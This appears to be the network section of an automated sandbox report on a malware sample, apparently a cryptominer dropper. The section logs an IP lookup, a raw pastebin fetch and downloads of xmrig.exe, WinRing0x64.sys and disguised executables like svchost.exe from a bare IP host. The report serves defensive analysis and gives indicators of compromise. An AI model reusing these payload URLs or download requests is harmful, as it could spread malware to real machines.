Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| pastebin.com | 104.20.68.143 | |
| api.ip.sb | 104.26.12.31 |
GET
200
https://api.ip.sb/ip
REQUEST
RESPONSE
BODY
GET /ip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 11 Dec 2023 10:27:30 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
Cache-Control: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XCv9CArEMBv%2F%2FqBGAcyp%2BvkwaArK%2Bqii4zCJG9wPlbWQFGynFBwrY3Fyb4bgbaidDrFmLf2OMaAlsClXxaw5Pl1y5wMecvQVtlWeiW5vE4Jo7TUGy%2FzCxi1a6g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 833d090f1a9f29d1-FUK
alt-svc: h3=":443"; ma=86400
GET
200
https://pastebin.com/raw/ZRRRiwsq
REQUEST
RESPONSE
BODY
GET /raw/ZRRRiwsq HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 11 Dec 2023 10:28:11 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: MISS
Last-Modified: Mon, 11 Dec 2023 10:28:11 GMT
Server: cloudflare
CF-RAY: 833d0a0d79307c89-LAX
GET
200
http://195.20.16.153/conhost.exe
REQUEST
RESPONSE
BODY
GET /conhost.exe HTTP/1.1
Host: 195.20.16.153
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 10:27:55 GMT
Content-Type: application/octet-stream
Content-Length: 2679368
Last-Modified: Wed, 06 Dec 2023 15:37:40 GMT
Connection: keep-alive
ETag: "65709544-28e248"
Accept-Ranges: bytes
GET
200
http://195.20.16.153/svchost.exe
REQUEST
RESPONSE
BODY
GET /svchost.exe HTTP/1.1
Host: 195.20.16.153
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 10:27:58 GMT
Content-Type: application/octet-stream
Content-Length: 329728
Last-Modified: Wed, 15 Nov 2023 13:39:56 GMT
Connection: keep-alive
ETag: "6554ca2c-50800"
Accept-Ranges: bytes
GET
200
http://195.20.16.153/xmrig.exe
REQUEST
RESPONSE
BODY
GET /xmrig.exe HTTP/1.1
Host: 195.20.16.153
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 10:28:11 GMT
Content-Type: application/octet-stream
Content-Length: 3026944
Last-Modified: Sat, 02 Dec 2023 16:31:45 GMT
Connection: keep-alive
ETag: "656b5bf1-2e3000"
Accept-Ranges: bytes
GET
200
http://195.20.16.153/WinRing0x64.sys
REQUEST
RESPONSE
BODY
GET /WinRing0x64.sys HTTP/1.1
Host: 195.20.16.153
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 10:28:11 GMT
Content-Type: application/octet-stream
Content-Length: 14544
Last-Modified: Tue, 14 Nov 2023 16:09:50 GMT
Connection: keep-alive
ETag: "65539bce-38d0"
Accept-Ranges: bytes
GET
200
http://195.20.16.153/WatchDog.exe
REQUEST
RESPONSE
BODY
GET /WatchDog.exe HTTP/1.1
Host: 195.20.16.153
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 10:28:25 GMT
Content-Type: application/octet-stream
Content-Length: 63488
Last-Modified: Tue, 14 Nov 2023 16:09:49 GMT
Connection: keep-alive
ETag: "65539bcd-f800"
Accept-Ranges: bytes
ICMP traffic
No ICMP traffic performed.
IRC traffic
| Command | Params | Type |
|---|---|---|
| MODE | proxy mode, nicehash (default) or simple | client |
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.103:49166 104.26.13.31:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 53:56:0b:3a:91:49:7f:18:59:87:21:98:d3:7f:98:0b:b4:ae:cb:cc |
|
TLS 1.2 192.168.56.103:49200 104.20.67.143:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 55:c8:82:61:30:05:42:80:db:47:5e:d0:66:b5:df:ac:14:5b:19:6f |
Snort Alerts
No Snort Alerts